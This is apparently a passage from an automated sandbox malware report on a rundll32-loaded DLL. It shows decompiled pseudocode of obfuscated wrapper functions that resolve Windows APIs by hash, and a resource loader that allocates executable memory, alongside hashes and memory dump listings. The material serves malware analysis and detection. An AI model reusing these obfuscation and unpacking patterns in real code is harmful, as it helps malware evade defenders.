				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
				return _t26;
			}

0x00385de9
0x00385deb
0x00385dfa
0x00385dff
0x00385e09
0x00385e15
0x00385e1c
0x00385e23
0x00385e27
0x00385e2b
0x00385e32
0x00385e4a
0x00385e58
0x00385e5f

APIs

SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 00385E58

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
Instruction ID: 4422f0babffc7885d9a9722d22b0b9a728c0fb83e68d8cf5354cca4e898c7c83
Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
Instruction Fuzzy Hash: 4901BC76901208BBDF24DE90CC0AEEEBF74EF55314F108088F50466250D7B05B109BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00381E22 Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00381E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				void* _t34;
				signed int _t36;
				long _t42;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t42 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003920B9(_t27);
				_v12 = 0x309d17;
				_v12 = _v12 | 0x1b560655;
				_v12 = _v12 ^ 0x1b78328a;
				_v8 = 0xa187d;
				_v8 = _v8 + 0xa972;
				_t36 = 0x67;
				_v8 = _v8 / _t36;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x000b519a;
				E0039AA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
				return _t34;
			}

0x00381e25
0x00381e26
0x00381e28
0x00381e2b
0x00381e2d
0x00381e30
0x00381e33
0x00381e37
0x00381e38
0x00381e3d
0x00381e47
0x00381e50
0x00381e57
0x00381e5e
0x00381e6a
0x00381e72
0x00381e7a
0x00381e7e
0x00381e91
0x00381ea0
0x00381ea6

APIs

RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,003880DB,?,00000000,AF136809), ref: 00381EA0

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
Instruction ID: 660ddb38d8cf1e01757d0d82c0ee96b2a953ae64ff172eb651ef209e3555d9b5
Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
Instruction Fuzzy Hash: C7014876901108FBEF05DFD4DC0A8DE7BB5EB45354F208089F9085A211D7B29F20AB91

Uniqueness

Uniqueness Score: -1.00%

Function 003946BB Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E003946BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E003920B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0039AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}

0x003946d5
0x003946da
0x003946e4
0x003946ec
0x003946f3
0x003946f7
0x003946fe
0x00394705
0x0039470c
0x00394724
0x00394735
0x0039473b

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00394735

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
Instruction ID: 258e6d4e8b29482b948a7333ea585e62312dd49c96b0ac4132fc1c8ea2064d46
Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
Instruction Fuzzy Hash: 2E01EC75801218BBCF15AFD5DC498DFBFB8EF45394F108145F91866211D2758A60DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 003893ED Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E003893ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0039AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}

0x003893f3
0x00389405
0x00389411
0x00389412
0x00389413
0x0038941a
0x00389421
0x00389428
0x00389433
0x00389436
0x0038943d
0x00389444
0x00389451
0x0038945b

APIs

ExitProcess.KERNEL32(00000000), ref: 0038945B

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
Instruction ID: b254800801b1a61987bd94f6ad65c6cf0e045f7e85af1ed804417b92d19c1b82
Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
Instruction Fuzzy Hash: 8FF03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7705F459A91

Uniqueness

Uniqueness Score: -1.00%

Function 00398F9E Relevance: 1.5, APIs: 1, Instructions: 31
serviceCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00398F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				unsigned int _v12;
				void* _t19;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003920B9(_t19);
				_v12 = 0xd87912;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0006adfb;
				_v8 = 0xf5ad8e;
				_v8 = _v8 + 0xc481;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00032ff7;
				E0039AA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
				_t24 = CloseServiceHandle(_a12); // executed
				return _t24;
			}

0x00398fa1
0x00398fa2
0x00398fa3
0x00398fa6
0x00398fa9
0x00398fad
0x00398fae
0x00398fb3
0x00398fbd
0x00398fc6
0x00398fcd
0x00398fd4
0x00398fdb
0x00398fdf
0x00398ff7
0x00399002
0x00399007

APIs

CloseServiceHandle.ADVAPI32(33E0711C), ref: 00399002

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
Instruction ID: 1291f78db16fa39b7ae5cd510eb7c8b5d9933725b5f0e12121bc610c67fa1373
Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
Instruction Fuzzy Hash: 71F0F9B591120CFFDF06AFD4C94A8AEBBB4EB14308F208198F80566611D6769B64EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00391F8A Relevance: 1.5, APIs: 1, Instructions: 31
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00391F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t19;
				int _t25;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E003920B9(_t19);
				_v12 = 0x96b134;
				_v12 = _v12 + 0xdeb4;
				_v12 = _v12 | 0x0c5d8169;
				_v12 = _v12 ^ 0x0cdc4dba;
				_v8 = 0xf8ae2a;
				_v8 = _v8 + 0xcab3;
				_v8 = _v8 * 0x2b;
				_v8 = _v8 ^ 0x29e0cf29;
				E0039AA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
				_t25 = DeleteFileW(_a4); // executed
				return _t25;
			}

0x00391f8d
0x00391f8e
0x00391f8f
0x00391f93
0x00391f94
0x00391f99
0x00391fa3
0x00391faf
0x00391fb6
0x00391fbd
0x00391fc4
0x00391fda
0x00391fdd
0x00391fea
0x00391ff5
0x00391ffa

APIs

DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 00391FF5

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
Instruction ID: 61f597a40476d8f9dbaa25dadb57c9dcf700dc7037ccf65c83e2a7879dce735a
Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
Instruction Fuzzy Hash: 1DF0F9B190120CFBDF18EFD4D9468AEBFB5EB50304F208299F40467222E7715F549B91

Uniqueness

Uniqueness Score: -1.00%

Function 00395BFD Relevance: 1.5, APIs: 1, Instructions: 31
libraryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00395BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t20;
				struct HINSTANCE__* _t25;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003920B9(_t20);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5faaf9;
				_v20 = 0xab22cd;
				_v12 = 0x8e3542;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00089943;
				_v8 = 0x9b967a;
				_v8 = _v8 ^ 0x4689732a;
				_v8 = _v8 ^ 0x4619bdd7;
				E0039AA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
				_t25 = LoadLibraryW(_a8); // executed
				return _t25;
			}

0x00395c03
0x00395c06
0x00395c0a
0x00395c0b
0x00395c10
0x00395c17
0x00395c23
0x00395c2a
0x00395c31
0x00395c35
0x00395c3c
0x00395c43
0x00395c4a
0x00395c62
0x00395c6d
0x00395c72

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00395C6D

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
Instruction ID: 9eddf8ab566af38925c5651abc9a25f94540e1be24591010f150dc0957bce1a8
Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
Instruction Fuzzy Hash: 64F0FFB5C0020CFBCF05EFE4DA06AEEBBB4FB40318F108188E91566212D3B54B58DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0038B23C Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0038B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003920B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E0039AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}

0x0038b23f
0x0038b240
0x0038b241
0x0038b244
0x0038b247
0x0038b24a
0x0038b24e
0x0038b24f
0x0038b254
0x0038b25e
0x0038b26a
0x0038b271
0x0038b278
0x0038b27f
0x0038b286
0x0038b28d
0x0038b294
0x0038b29b
0x0038b2b3
0x0038b2c1
0x0038b2c6

APIs

lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 0038B2C1

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
Instruction ID: 87a6f14a7064b2c0e083ec20b49cdd0999ec4da96f5d755f9db24dd72c960db5
Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
Instruction Fuzzy Hash: F4011A72C04608FFDF45DFD4DD468AEBB75EB44304F108188B90566252E3714B609B51

Uniqueness

Uniqueness Score: -1.00%

Function 00391E67 Relevance: 1.3, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00391E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t23;
				int _t29;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003920B9(_t23);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x62b4e9;
				_v20 = 0xc383c4;
				_v12 = 0x238243;
				_v12 = _v12 * 0x67;
				_v12 = _v12 ^ 0x0e4d658b;
				_v8 = 0x6564d0;
				_v8 = _v8 ^ 0x2b193590;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x8a2acb03;
				E0039AA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
				_t29 = CloseHandle(_a12); // executed
				return _t29;
			}

0x00391e6d
0x00391e70
0x00391e73
0x00391e77
0x00391e78
0x00391e7d
0x00391e84
0x00391e90
0x00391e97
0x00391ead
0x00391eb0
0x00391eb7
0x00391ebe
0x00391ec5
0x00391ec9
0x00391ed6
0x00391ee1
0x00391ee6

APIs

CloseHandle.KERNEL32(00C383C4), ref: 00391EE1

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
Instruction ID: 5acac0f1a2aaa77955c940beb2b2525e819f35c97f466940ef4a81b45f92b675
Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
Instruction Fuzzy Hash: D70124B5C00208FBCF40EFA4E94A9AEBFB5EB04308F108498E8156B212D7718B24DF91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 1456, Parent PID: 2308COMMON

Execution Graph

Execution Coverage:	16.1%
Dynamic/Decrypted Code Coverage:	16.2%
Signature Coverage:	0%
Total number of Nodes:	297
Total number of Limit Nodes:	23

Executed Functions

Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C

_printf.LIBCMT ref: 1001265F
FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
_malloc.LIBCMT ref: 100127F5

Strings

l, xrefs: 1001272D
l, xrefs: 100126F7
3, xrefs: 100126D9
ndldl, xrefs: 10012757, 1001275A
., xrefs: 10012721
l, xrefs: 100126D3
2, xrefs: 100126DF
DASHBOARD, xrefs: 1001267C
., xrefs: 100126E5
l, xrefs: 10012733
d, xrefs: 10012727
n, xrefs: 100126C7
l, xrefs: 100126F1
e, xrefs: 100126CD
kre3.l, xrefs: 10012748, 1001274B
6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0, xrefs: 10012802
l, xrefs: 1001271B
l, xrefs: 10012715
d, xrefs: 100126EB

Memory Dump Source

Source File: 0000000B.00000002.549940138.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.549922432.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.549994202.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550011381.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550025372.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550052939.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
API String ID: 572389289-2839844625
Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1

SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8

Memory Dump Source

Source File: 0000000B.00000002.549940138.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.549922432.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.549994202.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550011381.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550025372.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550052939.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 10006A9C

Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E

Memory Dump Source

Source File: 0000000B.00000002.549940138.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.549922432.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.549994202.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550011381.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550025372.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550052939.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54

Uniqueness

Uniqueness Score: -1.00%

Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
GlobalHandle.KERNEL32(006B7A78), ref: 100208A9
GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
GlobalHandle.KERNEL32(006B7A78), ref: 100208DB
GlobalLock.KERNEL32 ref: 100208E2
LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
GlobalLock.KERNEL32 ref: 100208F8
_memset.LIBCMT ref: 10020911
LeaveCriticalSection.KERNEL32(?), ref: 1002093D

Memory Dump Source

Source File: 0000000B.00000002.549940138.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.549922432.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.549994202.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550011381.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550025372.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550052939.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 1002FA87

Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1

___sbh_find_block.LIBCMT ref: 1002FA92
___sbh_free_block.LIBCMT ref: 1002FAA1
HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2

Memory Dump Source

Source File: 0000000B.00000002.549940138.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

